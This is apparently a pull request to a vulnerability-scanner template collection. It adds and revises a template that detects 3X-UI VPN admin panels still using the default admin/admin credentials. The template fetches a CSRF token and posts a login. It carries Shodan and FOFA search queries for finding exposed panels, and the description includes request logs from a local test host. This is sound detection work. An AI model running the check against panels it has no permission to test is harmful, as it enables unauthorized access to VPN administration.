### PR TITLE
3x UI template

### DIFF
--- a/http/default-logins/xui/3xui-default-login.yaml
+++ b/http/default-logins/xui/3xui-default-login.yaml
@@ -1,0 +1,59 @@
+id: 3xui-default-login
+
+info:
+  name: 3X-UI - Default Login
+  author: mapioe
+  severity: high
+  description: |
+    3X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+  reference:
+    - https://github.com/MHSanaei/3x-ui
+    - https://github.com/MHSanaei/3x-ui/wiki/Installation
+  classification:
+    cwe-id: CWE-798
+    cpe: 2.3:a:mhsanaei:3x-ui:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    fofa-query: app="3x-ui"
+    shodan-query: 3x-ui http.title:"Sign in"
+    product: 3x-ui
+    vendor: MHSanaei
+    tags: 3x-ui,default-login
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/csrf-token"
+    extractors:
+      - type: json
+        part: body
+        name: csrf-token
+        json:
+          - ".obj"
+        internal: true
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/login"
+
+    headers:
+      content-type: application/x-www-form-urlencoded
+      x-csrf-token: "{{ csrf-token }}"
+
+    body: "username={{username}}&password={{password}}"
+
+    attack: pitchfork
+    payloads:
+      username:
+        - "admin"
+      password:
+        - "admin"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(http_1_body, "\"success\":true")'
+          - 'contains_all(http_2_body, "\"success\":true", "msg\":")'
+          - "contains(http_2_header, 'application/json')"
+          - "http_2_status_code == 200"
+        condition: and

--- a/http/default-logins/xui/3xui-default-login.yaml
+++ b/http/default-logins/xui/3xui-default-login.yaml
@@ -5,55 +5,78 @@ info:
   author: mapioe
   severity: high
   description: |
-    3X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+    Detected 3X-UI contains default credentials admin/admin. An attacker can obtain access to the admin panel and manage VPN configurations, modify data, and execute unauthorized operations.
   reference:
     - https://github.com/MHSanaei/3x-ui
     - https://github.com/MHSanaei/3x-ui/wiki/Installation
   classification:
     cwe-id: CWE-798
-    cpe: 2.3:a:mhsanaei:3x-ui:*:*:*:*:*:*:*:*
+    cpe: cpe:2.3:a:mhsanaei:3x-ui:*:*:*:*:*:*:*:*
   metadata:
     verified: true
+    max-request: 3
     fofa-query: app="3x-ui"
-    shodan-query: 3x-ui http.title:"Sign in"
+    shodan-query: http.title:"3x-ui"
     product: 3x-ui
-    vendor: MHSanaei
-    tags: 3x-ui,default-login
+    vendor: mhsanaei
+  tags: 3x-ui,default-login
+
+variables:
+  username: "admin"
+  password: "admin"
+
+flow: http(1) && http(2) && http(3)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/csrf-token"
-    extractors:
-      - type: json
-        part: body
-        name: csrf-token
-        json:
-          - ".obj"
-        internal: true
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
 
-  - method: POST
-    path:
-      - "{{BaseURL}}/login"
-
-    headers:
-      content-type: application/x-www-form-urlencoded
-      x-csrf-token: "{{csrf-token}}"
-
-    body: "username={{username}}&password={{password}}"
-
-    attack: pitchfork
-    payloads:
-      username:
-        - "admin"
-      password:
-        - "admin"
+    host-redirects: true
+    max-redirects: 3
 
     matchers:
       - type: dsl
         dsl:
-          - 'contains(http_1_body, "\"success\":true")'
-          - 'contains_all(http_2_body, "\"success\":true", "msg\":")'
-          - "contains(http_2_header, 'application/json')"
-          - "http_2_status_code == 200"
+          - 'status_code == 200'
+          - 'contains_any(body, "X_UI_BASE_PATH", "<title>3x-ui")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /csrf-token HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "success")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: json
+        name: csrftoken
+        json:
+          - ".obj"
+        internal: true
+
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Csrf-Token: {{csrftoken}}
+
+        username={{username}}&password={{password}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains_all(body, "\"success\":true", "msg")'
         condition: and

--- a/http/default-logins/xui/3xui-default-login.yaml
+++ b/http/default-logins/xui/3xui-default-login.yaml
@@ -15,10 +15,10 @@ info:
   metadata:
     verified: true
     max-request: 3
-    fofa-query: app="3x-ui"
-    shodan-query: http.title:"3x-ui"
     product: 3x-ui
     vendor: mhsanaei
+    fofa-query: 'title="3x-ui"'
+    shodan-query: '3x-ui http.title:"sign in"'
   tags: 3x-ui,default-login
 
 variables:

--- a/http/default-logins/xui/3xui-default-login.yaml
+++ b/http/default-logins/xui/3xui-default-login.yaml
@@ -38,7 +38,7 @@ http:
 
     headers:
       content-type: application/x-www-form-urlencoded
-      x-csrf-token: "{{ csrf-token }}"
+      x-csrf-token: "{{csrf-token}}"
 
     body: "username={{username}}&password={{password}}"
 


### PR DESCRIPTION
### PR Information

Since version 3.0.0 3x-ui introduced csrf token to login form. Also in some other version they removed /panel handle for GET requests.

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->
I removed max-request from the template did i understood correctly that it will be added automatically?

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)
<details><summary>True positive</summary>
  
```
[INF] [3xui-default-login] Dumped HTTP request for http://chad.loc:2053/csrf-token

GET /csrf-token HTTP/1.1
Host: chad.loc:2053
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [3xui-default-login] Dumped HTTP response http://chad.loc:2053/csrf-token

HTTP/1.1 200 OK
Content-Length: 68
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-HuyRmrqfXUiJt6Zf+5w1YA'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; font-src 'self' data:; connect-src 'self' ws: wss:; object-src 'none'; frame-ancestors 'none'; base-uri 'self'; form-action 'self'
Content-Type: application/json; charset=utf-8
Date: Tue, 11 Aug 2026 21:03:35 GMT
Referrer-Policy: no-referrer
Set-Cookie: 3x-ui=REDACTED; Path=/; Expires=Wed, 12 Aug 2026 03:03:35 GMT; Max-Age=21600; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{"obj":"aAQplUd-naTIISRx6sfG2EegIyd1mDBc2G1P6WXfrxk","success":true}
[INF] [3xui-default-login] Dumped HTTP request for http://chad.loc:2053/login

POST /login HTTP/1.1
Host: chad.loc:2053
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Length: 29
Accept: */*
Accept-Language: en
Cookie: 3x-ui=REDACTED
content-type: application/x-www-form-urlencoded
x-csrf-token: aAQplUd-naTIISRx6sfG2EegIyd1mDBc2G1P6WXfrxk
Accept-Encoding: gzip

username=admin&password=admin
[DBG] [3xui-default-login] Dumped HTTP response http://chad.loc:2053/login

HTTP/1.1 200 OK
Content-Length: 83
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-GonadlzyP8JPO2nDO7J4lg'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; font-src 'self' data:; connect-src 'self' ws: wss:; object-src 'none'; frame-ancestors 'none'; base-uri 'self'; form-action 'self'
Content-Type: application/json; charset=utf-8
Date: Tue, 11 Aug 2026 21:03:35 GMT
Referrer-Policy: no-referrer
Set-Cookie: 3x-ui=REDACTED; Path=/; Expires=Wed, 12 Aug 2026 03:03:35 GMT; Max-Age=21600; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{"success":true,"msg":"You have successfully logged into your account.","obj":null}
[3xui-default-login:dsl-1] [http] [high] http://chad.loc:2053/login [password="admin",username="admin"]
```
</details>

<details><summary>Changed credentials</summary>

```
[INF] [3xui-default-login] Dumped HTTP request for http://chad.loc:2053/csrf-token

GET /csrf-token HTTP/1.1
Host: chad.loc:2053
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [3xui-default-login] Dumped HTTP response http://chad.loc:2053/csrf-token

HTTP/1.1 200 OK
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-/TWelqZwGvotQCdUn2xKEA'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; font-src 'self' data:; connect-src 'self' ws: wss:; object-src 'none'; frame-ancestors 'none'; base-uri 'self'; form-action 'self'
Content-Type: application/json; charset=utf-8
Date: Tue, 11 Aug 2026 21:10:19 GMT
Referrer-Policy: no-referrer
Set-Cookie: 3x-ui=REDACTED; Path=/; Expires=Wed, 12 Aug 2026 03:10:19 GMT; Max-Age=21600; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{"obj":"i-XkBLwM7MTZwD6lcYx3O2WkkTBzxla4bkgR48s3YCk","success":true}
[INF] [3xui-default-login] Dumped HTTP request for http://chad.loc:2053/login

POST /login HTTP/1.1
Host: chad.loc:2053
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Content-Length: 29
Accept: */*
Accept-Language: en
Cookie: 3x-ui=REDACTED
content-type: application/x-www-form-urlencoded
x-csrf-token: i-XkBLwM7MTZwD6lcYx3O2WkkTBzxla4bkgR48s3YCk
Accept-Encoding: gzip

username=admin&password=admin
[DBG] [3xui-default-login] Dumped HTTP response http://chad.loc:2053/login

HTTP/1.1 200 OK
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-ku+YF8DhM5pCoK1KZLLSNg'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; font-src 'self' data:; connect-src 'self' ws: wss:; object-src 'none'; frame-ancestors 'none'; base-uri 'self'; form-action 'self'
Content-Type: application/json; charset=utf-8
Date: Tue, 11 Aug 2026 21:10:19 GMT
Referrer-Policy: no-referrer
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{"success":false,"msg":"Invalid username or password or two-factor code.","obj":null}
```
</details>